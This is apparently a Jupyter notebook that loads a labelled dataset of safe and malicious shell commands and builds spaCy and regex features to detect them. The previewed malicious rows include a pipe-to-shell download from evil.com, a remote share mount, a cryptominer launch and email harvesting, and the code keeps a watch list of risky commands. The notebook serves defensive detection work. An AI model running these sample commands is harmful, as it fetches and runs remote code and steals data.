In [None]:
import pandas as pd

In [11]:
# Use a forward slash in the path: the original 'Dataset\commands-...' literal
# contained the invalid escape sequence "\c" (Python warns about it) and a
# backslash separator only resolves on Windows. A forward slash is accepted on
# Windows, Linux and macOS alike.
data = pd.read_csv('Dataset/commands-classification-cleaned.csv')

In [12]:
# Display the first rows of the loaded frame (head() defaults to 5 rows).
data.head()


Unnamed: 0,id,command,classification
0,1,find . -name '*.txt'; less file.txt,safe
1,2,man ls; help cd,safe
2,3,cd /tmp; nano example.txt,safe
3,4,cd /tmp; nano example.txt,safe
4,5,cd /tmp; nano example.txt,safe


In [13]:
# Display the last rows of the loaded frame (tail() defaults to 5 rows).
data.tail()

Unnamed: 0,id,command,classification
357,358,cd /tmp; nohup ./cryptominer -a cryptonight -o...,malicious
358,359,mount -t cifs //evil.com/share /mnt -o user=us...,malicious
359,360,cd /; find . -type f -size -100k 2>/dev/null |...,malicious
360,361,cd /var/mail; grep -r -E -o '\b[A-Za-z0-9._%+-...,malicious
361,362,"curl -s hxxp://evil.com/agent.sh | sh; echo ""*...",malicious


In [19]:
# Import necessary libraries
import pandas as pd
import spacy
import re
from sklearn.model_selection import train_test_split

ModuleNotFoundError: No module named 'spacy'

In [None]:

# 1. LOAD DATASET
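# Assumes the CSV has columns named exactly ID, Command, Classification
# (the lookups below are case-sensitive).
# NOTE: the file previewed earlier in this notebook uses lowercase names
# (id, command, classification); rename its columns before using these helpers.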
def load_data(data):
    """Load the command dataset from a CSV file and print a short summary.

    Args:
        data: Path of the CSV file (anything ``pd.read_csv`` accepts as its
            first argument). The file must contain a ``Classification``
            column, which is used for the class-distribution summary.

    Returns:
        pandas.DataFrame: The loaded dataset, unmodified.

    Raises:
        FileNotFoundError: If ``data`` is a local path that does not exist.
        KeyError: If the file has no ``Classification`` column.
    """
    # Bug fix: the original read from an undefined name `file_path` instead of
    # the `data` argument, so every call failed with NameError.
    df = pd.read_csv(data)
    print(f"Dataset loaded with {df.shape[0]} rows and {df.shape[1]} columns")
    print("\nColumn names:", df.columns.tolist())
    print("\nSample data:")
    print(df.head())

    # Check for missing values
    missing = df.isnull().sum()
    print("\nMissing values per column:")
    print(missing)

    # Classification distribution
    print("\nClassification distribution:")
    print(df['Classification'].value_counts())

    return df

# 2. PREPROCESS TEXT WITH SPACY
# Load the spaCy pipeline once at module level; extract_command_features()
# below calls this shared `nlp` object for every command it processes.
# NOTE(review): the "en_core_web_sm" model is presumably installed separately
# from the spacy package itself — confirm it is available in the environment.
nlp = spacy.load("en_core_web_sm")

def extract_command_features(command_text):
    """Run a command string through the shared spaCy pipeline and summarise it.

    Args:
        command_text: The raw command string to analyse.

    Returns:
        dict with the keys:
            'tokens'            - text of every token, in order
            'lemmas'            - lemma of every token, in order
            'entities'          - (text, label) pairs for each detected entity
            'token_count'       - number of tokens in the parsed document
            'has_special_chars' - True if the string contains ';', '|' or '&'
    """
    parsed = nlp(command_text)

    # Collect token text and lemma in a single pass over the document.
    token_texts = []
    token_lemmas = []
    for tok in parsed:
        token_texts.append(tok.text)
        token_lemmas.append(tok.lemma_)

    named_entities = [(span.text, span.label_) for span in parsed.ents]

    # Shell operators that separate or connect commands.
    contains_operator = re.search(r'[;|&]', command_text) is not None

    return {
        'tokens': token_texts,
        'lemmas': token_lemmas,
        'entities': named_entities,
        'token_count': len(parsed),
        'has_special_chars': contains_operator,
    }

# 3. EXTRACT KEY COMMAND FEATURES
def detect_command_patterns(command_text):
    """Scan a command string for a fixed set of command names and operators.

    Args:
        command_text: The raw command string to inspect.

    Returns:
        dict with boolean flags ('has_file_download', 'has_permission_change',
        'has_deletion', 'has_privilege_escalation', 'has_piping',
        'has_chaining'), the list of watched command names found
        ('found_commands', in order of appearance, duplicates kept) and its
        length ('command_count').
    """
    # Command names to look for as whole words.
    watched = ('wget', 'chmod', 'rm', 'sudo', 'su', 'passwd', 'curl', 'nc', 'bash')
    hits = re.findall(r'\b(' + '|'.join(watched) + r')\b', command_text)

    # One whole-word regex per boolean flag.
    flag_regexes = {
        'has_file_download': r'\b(wget|curl)\b',
        'has_permission_change': r'\b(chmod)\b',
        'has_deletion': r'\b(rm)\b',
        'has_privilege_escalation': r'\b(sudo|su)\b',
    }

    report = {}
    for flag, regex in flag_regexes.items():
        report[flag] = re.search(regex, command_text) is not None

    # Operator checks are plain substring tests, not regexes.
    report['has_piping'] = '|' in command_text
    report['has_chaining'] = any(sep in command_text for sep in (';', '&&'))
    report['found_commands'] = hits
    report['command_count'] = len(hits)

    return report

# Process the entire dataset
def process_dataset(df):
    """Attach spaCy and pattern-based features to every row of the dataset.

    The frame is modified in place (new columns are added to ``df``) and the
    same object is returned.

    Args:
        df: DataFrame with a 'Command' column holding the command strings.

    Returns:
        The same DataFrame, with the raw feature dicts in 'spacy_features' and
        'command_patterns' plus selected values promoted to their own columns.
    """
    commands = df['Command']

    # Raw per-command feature dictionaries.
    df['spacy_features'] = commands.apply(extract_command_features)
    df['command_patterns'] = commands.apply(detect_command_patterns)

    def _pick(source_col, key):
        # Pull one entry out of each row's feature dictionary.
        return df[source_col].apply(lambda record: record[key])

    # Promote selected dictionary entries to flat columns for easier analysis.
    for key in ('token_count', 'has_special_chars'):
        df[key] = _pick('spacy_features', key)

    for key in ('has_file_download', 'has_permission_change',
                'has_deletion', 'has_privilege_escalation'):
        df[key] = _pick('command_patterns', key)

    df['detected_commands'] = _pick('command_patterns', 'found_commands')

    return df

# Main workflow
def main(file_path="attacker_commands.csv"):
    """Run the whole workflow: load, featurize, preview, split and save.

    Args:
        file_path: CSV file to process. Defaults to "attacker_commands.csv",
            the value that used to be hard-coded inside the function, so
            calling ``main()`` with no arguments behaves as before. Pass a
            different path to run the workflow on another dataset.

    Returns:
        None. Progress and results are printed; the processed frame is written
        to "processed_commands.csv" in the current working directory.

    Errors are reported by printing a message rather than raising, so a
    failure in one step does not surface as a traceback.
    """
    try:
        # 1. Load the dataset
        df = load_data(file_path)

        # 2. Process the dataset
        processed_df = process_dataset(df)

        # 3. Show sample of processed data
        print("\nSample of processed data:")
        print(processed_df[['ID', 'Command', 'Classification', 'token_count',
                           'has_special_chars', 'has_file_download',
                           'has_permission_change', 'detected_commands']].head())

        # 4. Split data for ML (if needed)
        # random_state is fixed so the split is reproducible across runs.
        X_train, X_test, y_train, y_test = train_test_split(
            processed_df.drop('Classification', axis=1),
            processed_df['Classification'],
            test_size=0.2,
            random_state=42
        )
        print(f"\nData split for ML: {X_train.shape[0]} training examples, {X_test.shape[0]} test examples")

        # 5. Save processed data (optional)
        processed_df.to_csv("processed_commands.csv", index=False)
        print("\nProcessed data saved to 'processed_commands.csv'")

    except FileNotFoundError:
        print(f"Error: File '{file_path}' not found. Please update the file path.")
    except Exception as e:
        # Deliberate catch-all: report the problem instead of raising.
        print(f"Error processing data: {e}")

# Run the workflow only when this code is executed directly, not when it is
# imported as a module.
if __name__ == "__main__":
    main()

ModuleNotFoundError: No module named 'spacy'